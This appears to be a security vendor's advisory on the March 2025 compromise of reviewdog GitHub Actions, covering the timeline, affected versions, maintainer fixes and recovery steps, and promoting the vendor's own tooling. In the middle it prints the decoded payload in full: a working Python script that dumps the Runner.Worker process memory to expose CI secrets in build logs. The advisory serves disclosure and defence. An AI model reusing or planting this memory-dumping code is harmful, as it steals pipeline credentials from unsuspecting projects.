reviewdog GitHub Actions are compromised

Overview

We are still investigating this security incident. Independent researcher Adnan Khan has shared conclusive evidence that several reviewdog Actions served malicious code in the past. Wiz also published a research blog on this incident on the same day. As there is no public evidence of recovery, it might be safe to assume that these Actions can get compromised again.

Update 1: March 18, 2025 09:00 PM: The maintainer has taken the corrective steps to recover from the incident and published a summary. The compromise time period was between March 11, 2025 18:42 and 20:31 UTC. More details provided in the Maintainer’s Response section below.

Summary of the incident

Independent researcher Adnan Khan disclosed the incident via a tweet on Monday, March 17, at 01:00 AM UTC.

The researcher identified a sample workflow in which the malicious Action version was executed. The screenshot below shows that during this run, the reviewdog/action-setup@v1 tag referenced commit SHA f0d342d24037bb11d26b9bd8496e0808ba32e9ec.

‍

This commit includes the exploit payload encoded in base64 format.

https://github.com/reviewdog/action-setup/commit/f0d342d24037bb11d26b9bd8496e0808ba32e9ec

This commit contains the exploit payload in base64 encoded format. The decoded payload is given below:

#!/usr/bin/env python3

# based on https://davidebove.com/blog/?p=1620

import sys
import os
import re


def get_pid():
    # https://stackoverflow.com/questions/2703640/process-list-on-linux-via-python
    pids = [pid for pid in os.listdir('/proc') if pid.isdigit()]

    for pid in pids:
        with open(os.path.join('/proc', pid, 'cmdline'), 'rb') as cmdline_f:
            if b'Runner.Worker' in cmdline_f.read():
                return pid

    raise Exception('Can not get pid of Runner.Worker')


if __name__ == "__main__":
    pid = get_pid()
    print(pid)

    map_path = f"/proc/{pid}/maps"
    mem_path = f"/proc/{pid}/mem"

    with open(map_path, 'r') as map_f, open(mem_path, 'rb', 0) as mem_f:
        for line in map_f.readlines():  # for each mapped region
            m = re.match(r'([0-9A-Fa-f]+)-([0-9A-Fa-f]+) ([-r])', line)
            if m.group(3) == 'r':  # readable region
                start = int(m.group(1), 16)
                end = int(m.group(2), 16)
                # hotfix: OverflowError: Python int too large to convert to C long
                # 18446744073699065856
                if start > sys.maxsize:
                    continue
                mem_f.seek(start)  # seek to region start
            
                try:
                    chunk = mem_f.read(end - start)  # read region contents
                    sys.stdout.buffer.write(chunk)
                except OSError:
                    continue

‍

This payload, similar to the tj-actions/changed-files incident, accesses the Runner.Worker process memory to steal GitHub Actions secrets. The exfiltrated secrets are subsequently printed in the GitHub Actions workflow logs. The following screenshot from the sample run shows the dumped secrets within the build logs.

This GitHub code search in the reviewdog organization shows that there are a few other composite Actions that depend on the reviewdog/action-setup Action. We have given the list composite reviewdog Actions that use reviewdog/action-setup below.

1. reviewdog/action-shellcheck
2. reviewdog/action-composite-template
3. reviewdog/action-staticcheck
4. reviewdog/action-ast-grep
5. reviewdog/action-typos

As reviewdog/action-setup is compromised, it's safe to assume that atleast the list of Actions given above in the reviewdog organization are also compromised.

Maintainer’s Response

Incident Background

The maintainers of the reviewdog GitHub Actions have acknowledged the security breach and provided additional details about the compromise. According to their investigation, the attack targeted reviewdog/action-setup@v1, potentially leading to the compromise of other widely used GitHub Actions, including tj-actions/changed-files. As a result, repositories using these actions may have inadvertently leaked sensitive information.

The compromise occurred on March 11, 2025, between 18:42 and 20:31 UTC.

How Did the Attack Happen?

The attacker managed to push malicious code to the v1 tag of reviewdog/action-setup. The reviewdog organization’s contributor management process appears to have played a role in this incident. Contributors to reviewdog/action-* repositories were automatically invited to a maintainer team that had write access to these repositories. At the time of the attack, this team had 118 members, increasing the likelihood of an account being compromised.

While the exact method of exploitation is still under investigation, the maintainers suspect the attacker either compromised an existing contributor’s account or gained write access through the automated invitation process. The reviewdog maintainers have clarified that contributors did not have write access to the main reviewdog repository or core projects such as errorformat.

Impacted GitHub Actions

The following reviewdog actions have been identified as affected:

• reviewdog/action-setup@v1 (other tags may also be impacted, though no evidence has been found)
• reviewdog/action-shellcheck@{<v1.29.2}
• reviewdog/action-composite-template@{<v0.20.2}
• reviewdog/action-staticcheck@{<v1.26.2}
• reviewdog/action-ast-grep@{<v1.26.2}
• reviewdog/action-typos@{<v1.17.2}

There is a possibility that other reviewdog actions may also be impacted, though no additional evidence has been found so far.

Actions Taken by the Maintainers

In response to the breach, the maintainers have implemented several security measures:

• Disabled the automated contributor invitation workflow to prevent unauthorized access.
• Revoked write access for most contributors, restricting it to a small group of trusted maintainers.
• Updated all reviewdog repositories to explicitly reference GitHub Actions by commit SHA instead of version tags.
• Pinned reviewdog binary installation scripts using commit SHAs.
• Reviewed security logs and found no suspicious activity related to their maintainer and bot accounts.
• Rotated or revoked Personal Access Tokens (PATs) associated with maintainer and bot accounts.

Recovery steps

🚨 If you are using any of the following Actions from the reviewdog organization, we strongly recommend you stop using it immediately until the incident is resolved.

1. reviewdog/action-setup
2. reviewdog/action-shellcheck
3. reviewdog/action-composite-template
4. reviewdog/action-staticcheck
5. reviewdog/action-ast-grep
6. reviewdog/action-typos

If possible, stop using all reviewdog Actions till the impact of the incident is clear.

Review Actions Inventory

You should perform a code search across your repositories to discover all instances of the reviewdog Actions. For example, the following GitHub search URL shows this information for the Actions GitHub organization:

https://github.com/search?q=org%3Aactions+reviewdog&type=code‍
Please note that this GitHub search does not always return accurate results. If you have dedicated source code search solutions such as SourceGraph, they could be more effective with finding all instances of this Action in use.

Review GitHub Actions Workflow Run Logs

You should review logs for the recent executions reviewdog Actions and see if it has leaked secrets. Below is an example of how leaked secrets appear in build logs.

‍

This step is especially important for public repositories since their logs are publicly accessible.

Rotate Leaked Secrets

If you discover any secrets in GitHub Actions workflow run logs, rotate them immediately.

For StepSecurity Enterprise Customers

The following steps are applicable only for StepSecurity enterprise customers. If you are not an existing enterprise customer, you can start our 14 day free trial by installing the StepSecurity GitHub App to complete the following recovery step.

Discover Leaked Secrets

We have added a new control specifically to detect leaked secrets in build logs due to this security incident. You can find the new control on the StepSecurity dashboard.

Review Actions Inventory

You can use the Actions inventory feature to discover all GitHub Actions workflows that are using reviewdog Actions.

Use the StepSecurity maintained reviewdog/actions-setup Action

StepSecurity Maintained Actions are usually exclusive to StepSecurity enterprise customers.

To use the StepSecurity maintained Action for reviewdog/actions-setup, simply replace all instances of "reviewdog/actions-setup@vx" with "step-security/reviewdog-action-setup@fab6de28ae8bc2a032c9e655d990afa450edb995 # v1.3.2" or "step-security/reviewdog-action-setup@v1".

For enhanced security, you can pin to the specific commit SHA:

For more details, please refer to README of the project.

Next Steps

This incident is still developing. We will continue to monitor the situation and provide updates as more information becomes available.

🚨 More Supply Chain Attacks Could Follow

With credentials leaked in both the tj-actions compromise and this reviewdog incident, there may already be other supply chain attacks that have occurred—or could happen soon. Attackers could reuse leaked credentials to compromise additional GitHub Actions, making it critical to secure your CI/CD pipelines proactively.

‍